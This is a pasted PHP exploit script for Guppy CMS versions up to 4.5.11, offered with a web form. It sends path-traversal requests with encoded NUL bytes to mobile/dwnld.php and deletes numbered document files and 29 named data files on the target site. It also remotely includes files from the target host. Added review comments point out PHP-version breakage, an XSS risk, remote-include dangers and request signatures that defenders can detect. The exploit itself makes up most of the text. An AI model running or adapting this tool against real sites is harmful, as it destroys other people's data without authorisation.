Aluf

Guppy-(Delete Databases) Remote Denial of Service

Jan 31st, 2015
  1. # Change line 30 s/htp/http if you would like to see the logo. /str0ke
  2.  
  3. <?php
  4. #                    Guppy <= 4.5.11 Remote DOS Exploit                       #
  5. #                               by Aluf                                       #
  6. #             Computer Security Science Researchers Institute                 #
  7. #                           [http://www.KAPDA.ir]                             #
  8. #                                                                             #
  9.  
  10. error_reporting(0);
  11. ini_set("max_execution_time",0);
  12. ini_set("default_socket_timeout", 5);
  13. ob_implicit_flush (1);
  14.  
// Emit the tool's own input form (host, path, document count, port, proxy).
// NOTE(review): the action attribute is built from '.$SERVER[PHP_SELF].' —
// $SERVER is an undefined variable and PHP_SELF an undefined constant (PHP 8
// throws Error for the latter), so the action is empty or the script dies
// here. If $_SERVER['PHP_SELF'] was intended, it must go through
// htmlspecialchars() before being placed in the attribute: the request path is
// caller-controlled and a self-posting form that reflects it unescaped is the
// textbook reflected-XSS case. The declared charset is windows-1252, so any
// escaping should be done for that charset.
echo'<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Guppy &lt;= 4.5.11 Remote DOS Exploit</title>
</head>

<body bgcolor="#FFCCFF">

<p align="center"><font size="4" color="#0000FF">Guppy &lt;= 4.5.11 Remote DOS
Exploit</font></p>
<p class="Stile6" align="center"><font size="3" color="#FF0000">by trueend5</font></p>
<p align="center"><font size="4" color="#008000">Computer Security Science Researchers
Institute</font></p>
<font SIZE="3">
<p align="center"><a href="http://www.kapda.ir">KAPDA</a></p>
<p align="center"><img border="0" src="http://irannetjob.com/pics/ph-logo.png" width="120" height="121"></p>
</font>
<table width="90%">
 <tbody>
   <tr>
     <td width="43%" align="left">
       <form name="form1" action="'.$SERVER[PHP_SELF].'" method="post">
         <p><input name="host" size="20"> <span class="Stile5"><font color="#FF0000">*</font> hostname (ex:www.sitename.com)</span></p>
         <p><input name="path" size="20"> <span class="Stile5"><font color="#FF0000">*</font> path (ex:
         /guppy/
         or just / )</span></p>
         <p><input name="num" size="20"> <span class="Stile5">how many document
         do you want to destroy (default is 100)</span></p>
         <p>&nbsp; This option works when magic_quotes_gpc is Off</p>
         <p><input name="port" size="20"><span class="Stile5">specify a port&nbsp;
         (default is 80)</span></p>
         <p><input name="proxy" size="20"><span class="Stile5">send exploit
         through an HTTP proxy (ip:port)</span></p>
         <p align="center"> <span class="Stile5"><font color="#FF0000">&nbsp;&nbsp;
         * </font>fields are required</span></p>
         <p align="center"><span class="Stile5">-----------------------------------------------------------------------------------------------</span></p>
         
         <p><input type="submit" value="Start" name="Submit"></p>
       </form>
     </td>
   </tr>
 </tbody>
</table>
</body></html>';
  59. function show($headeri)
  60. {
  61.   $ii=0;$ji=0;$ki=0;$ci=0;
  62.   echo '<table border="0"><tr>';
  63.   while ($ii <= strlen($headeri)-1){
  64.     $datai=dechex(ord($headeri[$ii]));
  65.     if ($ji==16) {
  66.       $ji=0;
  67.       $ci++;
  68.       echo "<td>&nbsp;&nbsp;</td>";
  69.       for ($li=0; $li<=15; $li++) {
  70.         echo "<td>".$headeri[$li+$ki]."</td>";
  71.         }
  72.       $ki=$ki+16;
  73.       echo "</tr><tr>";
  74.     }
  75.     if (strlen($datai)==1) {
  76.       echo "<td>0".$datai."</td>";
  77.     }
  78.     else {
  79.       echo "<td>".$datai."</td> ";
  80.     }
  81.     $ii++;$ji++;
  82.   }
  83.   for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) {
  84.     echo "<td>&nbsp&nbsp</td>";
  85.   }
  86.   for ($li=$ci*16; $li<=strlen($headeri); $li++) {
  87.     echo "<td>".$headeri[$li]."</td>";
  88.   }
  89.   echo "</tr></table>";
  90. }
  91.  
// Matcher for the optional "ip:port" proxy field. The surrounding parentheses
// are the PCRE delimiters (a valid, if unusual, choice), not a capture group.
// The pattern is unanchored and only counts digits, so "999.999.999.999:99999"
// passes and an ip:port embedded in a longer string also matches; both
// sendpacket() and sendpacketii() die when it does not match and otherwise
// split the value on ':' as is.
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
  93.  
/**
 * Send the global $packet over a raw TCP socket, directly to $host:$port or
 * to the ip:port named in $proxy, and echo the response (HTML-escaped).
 * Not called anywhere in this file; the script uses sendpacketii() instead.
 *
 * Reads globals: $proxy, $host, $port, $packet, $proxy_regex.
 * Writes global: $html (the raw response).
 * Terminates the script with die when $proxy does not match $proxy_regex.
 */
function sendpacket()
{
  global $proxy, $host, $port, $packet, $html, $proxy_regex;
  $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  // NOTE(review): socket_create() returns a resource/Socket object or false,
  // never a negative number, so this test cannot detect a failure; the
  // socket_connect() check further down has the same problem (bool return).
  if ($socket < 0) {
    echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
  }
  else {
    // The regex test runs before the empty-proxy case is considered, so an
    // empty $proxy fails it too and the script dies here.
    $c = preg_match($proxy_regex,$proxy);
    if (!$c) {echo 'Not a valid proxy';
    die;
    }
  echo "OK.<br>";
  echo "Attempting to connect to ".$host." on port ".$port."...<br>";
  if ($proxy=='') {
    $result = socket_connect($socket, $host, $port);
  }
  else {
    $parts =explode(':',$proxy);
    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
    $result = socket_connect($socket, $parts[0],$parts[1]);
  }
  if ($result < 0) {
    echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
  }
  else {
    echo "OK.<br><br>";
    $html= '';
    socket_write($socket, $packet, strlen($packet));
    echo "Reading response:<br>";
    // Reads until the peer closes; relies on default_socket_timeout set above.
    while ($out= socket_read($socket, 2048)) {$html.=$out;}
    // Response is escaped before being placed in the page.
    echo nl2br(htmlentities($html));
    echo "Closing socket...";
    socket_close($socket);
  }
  }
}
  131.  
/**
 * Send one prepared HTTP request and collect the whole response into the
 * global $html, either directly to $host:$port or through the ip:port in
 * $proxy.
 *
 * Reads globals: $proxy, $host, $port, $proxy_regex.  Writes global: $html.
 * Terminates the script with die when the connection fails or $proxy does
 * not match $proxy_regex. With error_reporting(0) in effect, fsockopen()
 * failures produce no diagnostic beyond the echoed message.
 *
 * @param string $packet complete request text, headers and terminator included
 */
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    // gethostbyname() returns the name unchanged on lookup failure, so a bad
    // hostname surfaces as a failed fsockopen() below.
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.htmlentities($host); die;
    }
  }
  else {
    $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy';die;
    }
    $parts=explode(':',$proxy);
    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
    }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    // Reads one byte at a time until EOF *and* an end-of-headers blank line
    // have both been seen. eregi() was removed in PHP 7.0, so on current PHP
    // this condition raises an Error instead; and because the two tests are
    // joined with `or`, a peer that closes without ever sending "\r\n\r\n"
    // leaves this loop spinning on an exhausted stream.
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}
  168.  
// ---------------------------------------------------------------------------
// Form handling. The array keys below are bare words, i.e. undefined
// constants: PHP < 8 silently falls back to the strings 'host', 'path', ...;
// PHP 8 throws Error. $proxy, although offered by the form, is never read
// from $_POST in this block — presumably this relied on register_globals
// (removed in PHP 5.4); verify before assuming the proxy branch is reachable.
// ---------------------------------------------------------------------------
$host=$_POST[host];
$path=$_POST[path];
$port=$_POST[port];
$num=$_POST[num];

if (($host<>'') and ($path<>''))
{
  // intval() turns a blank field into int 0; the '' comparisons that follow
  // only hold under PHP 7's loose rules (0 == '' is false on PHP 8), so the
  // 80 / 100 defaults are not applied there.
  $port=intval(trim($port));
  $num=intval(trim($num));
  if ($port=='') {$port=80;}
  if ($num=='') {$num=100;}
  // Path must look like "/.../". Only the exact "\r\n" pair is stripped from
  // host and path afterwards (a lone "\n" is not), and $p is built from the
  // unstripped $host.
  if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('Error... check the path!');}
  if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
  $host=str_replace("\r\n","",$host);
  $path=str_replace("\r\n","",$path);
  echo ' Try to see if magic_quotes_gpc is enable! ...';
  // Every request this tool emits has the same shape, which is what a
  // target-side log review or WAF rule can key on: GET <path>mobile/dwnld.php
  // with a pg= value of "./%2E./<name>" (dot-segment traversal, here followed
  // by an encoded NUL) and one of two fixed User-Agent strings.
  $packet="GET ".$p."mobile/dwnld.php?pg=./%2E./test.inc%00"." HTTP/1.1\r\n";
  $packet.="User-Agent: Shareaza v1.x.x.xx\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Connection: Close\r\n\r\n";
  show($packet);
  sendpacketii($packet);
  $test='http://'.$host.$path.'data/test.inc';
  // NOTE(review): include() of an http:// URL (needs allow_url_include) does
  // not merely probe for the file — it executes whatever the remote host
  // returns as PHP, inside this script, with this process's privileges. A
  // host that answers with PHP code takes over the machine running this tool.
  // The same applies to the include of $test2 further down.
  if (!include("$test")) {
  echo'It seems magic_quotes_gpc is On. Trying STEP 2 ...';
}
  else {echo'magic_quotes_gpc is disable. STEP 1:';
  for ($n = 1; $n <= $num; $n++) {
  $packet="GET ".$p."mobile/dwnld.php?pg=./%2E./doc".$n.".inc%00"." HTTP/1.1\r\n";
  $packet.="User-Agent: Shareaza v1.x.x.xx\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Connection: Close\r\n\r\n";
  show($packet);
  sendpacketii($packet);
  }
}
  echo' STEP 2:';
  for ($n = 1; $n <= 29; $n++) {
  // Lookup table written as 29 independent ifs; exactly one matches per $n.
  if ($n==1) {$str='ar';} if ($n==2) {$str='counter';} if ($n==3) {$str='dn';} if ($n==4) {$str='docid';} if ($n==5) {$str='fa';}
  if ($n==6) {$str='fr';} if ($n==7) {$str='frcat';} if ($n==8) {$str='frcount';} if ($n==9) {$str='frth';} if ($n==10) {$str='ippoll';}
  if ($n==11) {$str='ipstats';} if ($n==12) {$str='li';} if ($n==13) {$str='log_date';} if ($n==14) {$str='log_files';}
  if ($n==15) {$str='log_stats';} if ($n==16) {$str='logbook';} if ($n==17) {$str='logd';} if ($n==18) {$str='logh';}
  if ($n==19) {$str='logm';} if ($n==20) {$str='logp';} if ($n==21) {$str='logy';} if ($n==22) {$str='nextid';}
  if ($n==23) {$str='nwlist';} if ($n==24) {$str='ph';} if ($n==25) {$str='poll';} if ($n==26) {$str='ra';}
  if ($n==27) {$str='rs';} if ($n==28) {$str='stats';} if ($n==29) {$str='statsbk';}
  $packet="GET ".$p."mobile/dwnld.php?pg=./%2E./$str"." HTTP/1.1\r\n";
  $packet.="User-Agent: SnoopRob/x.x\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Connection: Close\r\n\r\n";
  show($packet);
  sendpacketii($packet);
  }
  $test2='http://'.$host.$path.'data/stats.dtb';
  // Remote include again — see the note on $test above.
  include("$test2");
  // eregi() was removed in PHP 7.0; on current PHP this line raises an Error
  // (undefined function) before either message is printed. $html is the last
  // response body left behind by sendpacketii().
  if (eregi("1",$html)) {echo "Exploit succeeded"; }
                           else {echo "Exploit failed...";}
}
else
{echo "IMPORTANT NOTICE: This POC is just for educational purposes, Please Do not use it against external websites<br>
You are responsible for any damage that .... ";}
  229.  
  230. ?>